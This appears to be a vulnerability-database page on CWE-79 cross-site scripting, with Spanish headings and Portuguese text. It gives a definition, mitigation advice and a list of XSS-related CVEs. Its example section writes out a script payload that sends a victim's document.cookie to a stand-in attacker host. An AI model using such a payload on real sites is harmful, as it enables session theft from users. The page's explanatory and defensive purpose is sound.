Fallos del tipo CWE-79

28.618 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2020-2497—Cross-site scripting vulnerability in QTS and QuTS heroEPSS 1.0%CVE-2020-8176—A cross-site scripting vulnerability exists in koa-shopify-auth v3.1.61-v3.1.62 that allows an attacker to inject JS payloads into the `shopEPSS 1.0%CVE-2022-39207MEDIUMPersistent XSS in OneDevEPSS 1.0%CVE-2020-25628—The filter in the tag manager required extra sanitizing to prevent a reflected XSS risk. This affects 3.9 to 3.9.1, 3.8 to 3.8.4, 3.7 to 3.7EPSS 1.0%CVE-2022-23081—Openlibrary - Reflected XSSEPSS 1.0%CVE-2020-1721—A flaw was found in the Key Recovery Authority (KRA) Agent Service in pki-core 10.10.5 where it did not properly sanitize the recovery ID duEPSS 1.0%CVE-2024-30929HIGHCross Site Scripting vulnerability in DerbyNet v9.0 and below allows attackers to execute arbitrary code via the 'back' Parameter in playlisEPSS 1.0%CVE-2022-39332MEDIUMCross-site scripting (XSS) in Nextcloud Desktop Client EPSS 1.0%CVE-2022-44947MEDIUMRukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?moEPSS 1.0%CVE-2024-34064MEDIUMJinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filterEPSS 1.0%CVE-2022-32923MEDIUMA correctness issue in the JIT was addressed with improved checks. This issue is fixed in tvOS 16.1, iOS 15.7.1 and iPadOS 15.7.1, macOS VenEPSS 1.0%CVE-2023-43091CRITICALGnome-maps: gnome maps is vulnerable to a code injection attack (similar to xss) via its service.jsonEPSS 1.0%CVE-2022-23494MEDIUMCross-site scripting vulnerability in TinyMCE alertsEPSS 1.0%CVE-2022-2515MEDIUMSimple Banner <= 2.11.0 - Authenticated Stored Cross-Site ScriptingEPSS 1.0%CVE-2018-14784—NetComm Wireless G LTE Light Industrial M2M Router (NWL-25) with firmware 2.0.29.11 and prior. The device is vulnerable to several cross-sitEPSS 1.0%CVE-2017-16006—Remarkable is a markdown parser. In versions 1.6.2 and lower, remarkable allows the use of `data:` URIs in links and can therefore execute jEPSS 1.0%CVE-2022-39333MEDIUMCross-site scripting (XSS) in Nextcloud Desktop ClientEPSS 1.0%CVE-2022-43167MEDIUMA stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel vEPSS 1.0%CVE-2026-40878LOWmailcow-dockerized Login Page has Reflected Parameter Injection / Wrong-Context XSS EscapingEPSS 1.0%CVE-2022-0565HIGHCross-site Scripting in pimcore/pimcoreEPSS 1.0%